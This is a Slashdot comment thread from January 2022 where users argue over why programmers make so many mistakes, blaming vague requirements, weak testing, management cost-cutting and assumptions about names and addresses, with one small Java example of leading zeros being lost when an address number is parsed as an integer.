    People don't think in terms of such low-level, nonsensical crap. It's handled by your brain so that you don't have to think that way. Language is a whole bunch of shared context -- and if you don't have that context, most people's conversations are very, very confusing. (Hell, look at legalese.)

    The reason so many mistakes are made is because we have to do things fundamentally un-human -- and no one at all is good at being un-human. We work on models of the world, but these models don't exist in software development. (Some like to suggest they make cutesy models, and they suck -- and they're still not models of our 20-40-year life experience of the thing we're dealing with right this moment.) So, we spread the peanut butter on our hands sometimes.

    Why isn't a number allowed in a company name? Because wtf NAME has a NUMBER in it? That's nonsense! Requirements are what is developed for, and "name" was never defined to be something other than a person's name. When you say "name," any normal human thinks "Bob, Joe, Neo, Morpheus" -- and not "Sam Adam's 123 Kaleidoscope". That's just nonsense.

    So you're doing things that are outside the model being developed, outside the specifications being designed for (why wasn't it designed properly? Because a name is a name, not ABC-127_f3), and no one but you has run into that issue so far. Probably. At least for something new.

    • by Jeremi ( 14640 )

      Because a name is a name, not ABC-127_f3), and no one but you has run into that issue so far.

      Well, me and this kid [washingtonpost.com].
          Thanks, Elon!

  • by Jeremi ( 14640 ) on Monday January 10, 2022 @01:59AM (#62158967) Homepage

    ... in everything they do.

    In most everyday activities, minor mistakes don't greatly effect the outcome(*). In programming, however, they often do, which makes the mistakes more noticeable.

    (*) case in point -- I should have written affect rather than effect, but despite my error, you understood what I meant to convey. For computer code, OTOH, a minor error like that could have significant repercussions.

    • by shanen ( 462549 )

      Surprising to see my third reason so far down in the discussion...

      But I should have added a fifth reason:

      (5) Insufficient testing, every way you slice it. Not in the schedule and not funded, not demanded of the programmers, not performed by people who even understand the program specs, and so forth and so on.

      • And that insufficient testing probably had its roots in insufficient specification of what was required.

  • The kernel compiles so fast, there's no longer time to get coffee. This leads to a chronic caffeine shortage and ensuing bad code.

  • It's amazing, given the many layers of complexity in a computer and in software, that any software ever works at all! No programmer even understands all the layers of APIs and SDKs and OS functionality and hardware instructions that must all work correctly for software to work as intended. Despite this impossible contraption they operate, programmers manage to make many useful apps. I'm impressed.

  • Yes, the typical coder is incompetent, under-educated for their job, insufficiently experienced, and often arrogant (which prevents learning) in addition. Some may be lazy, but I think that is a secondary issue.

    But the actual fault is with management that hires people not fit for the job, because they are "cheaper." Nobody would dream of hiring an electrician to do an EE's job (and that electrician would still be better qualified than the average coder). As this has been going on for a long, long time and no

  • They don't value correctness because that would take "work"

    "There's never time to do it right, but always time to do it over."

    I think this is the opposite of what sysadmins and other IT people, who aren't programmers by trade but happen to code/script when they need to, end up doing. If I think a task will be repeated in the future, I spend more time creating scripts and programs to automate tasks I have to do than it would take to do the task manually, because then if that task ever comes up again I

  • by Required Snark ( 1702878 ) on Monday January 10, 2022 @02:17AM (#62159033)
    All you damn coders are wasting time on Slashdot and rotting your brains when you should have your eyes pinned to your screens fixing your stupid code.

    Get back to work. Now!

  • Maybe programmers make fewer mistakes than the rest of the population.

  • by Kelxin ( 3417093 ) on Monday January 10, 2022 @02:24AM (#62159059)
    Many people see "coding bootcamps" as get-rich-quick schemes -- both the people teaching them and the people taking them. Once they get into a position they are woefully unprepared, but they're surrounded by people of a similar skill set, so everyone just sweeps it under the rug and keeps getting a paycheck.
  • Software development is a stool made from 3 legs:

    1. Cost
    2. Time
    3. Quality

    You can only control 2 of the 3. Most businesses want to control cost and time, so they end up sacrificing quality.

    This is significantly worse when dealing with consultants (I know because I am one). In consulting, you maximize profit by doing the least amount of work with the fewest resources in the shortest time possible. No developer wants to deliver bad code, but no client wants to pay what quality code actually costs.

  • If human life or massive lawsuits aren't on the line, no one wants to foot the bill for reasonably correct, fully tested software. It's feature, feature, feature, feature, and I want it yesterday. If you draw a line in the sand, your competitor pours into the client's ear the lie he wants to hear, and you lose the client's business.
  • In my opinion it isn't programmers that suck. It's users that are too stupid to put themselves in their shoes. Take the Evergreen, I mean, how hard can it be to not steer your ship into the sides of a tiny canal right? I'm sure many people must have sighed and said, "gee, if I had captained that ship that would never have happened, the captain must be incompetent and lazy".

    Same goes for programming, it is far more complicated with far more requirements than you would ever care to want to know about -- and

    • Take the Evergreen, I mean, how hard can it be to not steer your ship into the sides of a tiny canal right?

      I don't know, but it doesn't happen very often.

  • US programmers forget that the US has an illogical date system which confuses almost everybody else. On remote islands (my experience was on Malaysian islands) it is not uncommon for people to have one single name. No first and second, just one. Names do not always start with upper case letters and people who have middle names that are not upper case often do not like being forced to use upper case.
  • Ignorance, not from programmers, but from their bosses who specify the work.

    For example, where I live, there are a few instances of house addresses beginning with zero (like 0123), because they are south of the standardized zero point. How many people know this? This is why too many IT systems won't let people enter their addresses properly.

    Also, stupidly, Slashdot does not allow characters higher than ASCII-127.
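
    A tiny illustration of the leading-zero point: an address "number" is a label, not a quantity, so store it as text (the values here are made up):

        public class AddressDemo {
            public static void main(String[] args) {
                String houseNumber = "0123";               // as the resident writes it
                int asInt = Integer.parseInt(houseNumber); // becomes 123: leading zero lost
                System.out.println(houseNumber + " stored as an int becomes " + asInt);
            }
        }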

  • Properly specifying and verifying all the code is orders of magnitude more work than just slapping something together, and it's also proportionally more expensive. You have a limited amount of time and money, and within that a system must get up and running; some bugs are acceptable. So that's exactly what you get. An online questionnaire is not a lunar lander touchdown program; if it works at all, that's already good enough, and it's probably a side note within a larger set of project requirements anyway.
  • In my (long and undistinguished) career as a programmer / software developer / software engineer, I've come to the conclusion that programming is a craft skill. However, the industry doesn't encourage you to develop and refine your skill.

    To some extent this is down to management expectation. Annual objectives (for instance) favour broadening one's skill-set (i.e. learning something new) rather than deepening one's skill-set (by getting better at what one already knows). The reason is that the former is more
  • Simple: (Almost) every mistake a programmer makes is visible somewhere, but there's actually very little consequence to it. Put another way, bugs happen all the time, people notice but it doesn't matter.

    Off by one, program crashes...user restarts it. Miss a "delete" somewhere, program runs out of memory (eventually), user restarts it. Some tiny bug corrupts user data, company fixes it, issues apology, life goes on. With a few (notable) exceptions, when a programmer makes a mistake, life goes on. Very f

  • While the topic itself is somewhat interesting, the examples are about design decisions, not programming ones. Sure, the second example is the result of some limitation on the programming side, but it's still a design decision. If both examples show user messages that something is disallowed, and didn't just cause a problem, then the programmer did his or her job well, as they were asked.

    So the real question is, why do programmers get blamed for design decisions? In most cases the programmers aren't the o

  • Let he who thinks he can do better, do better.
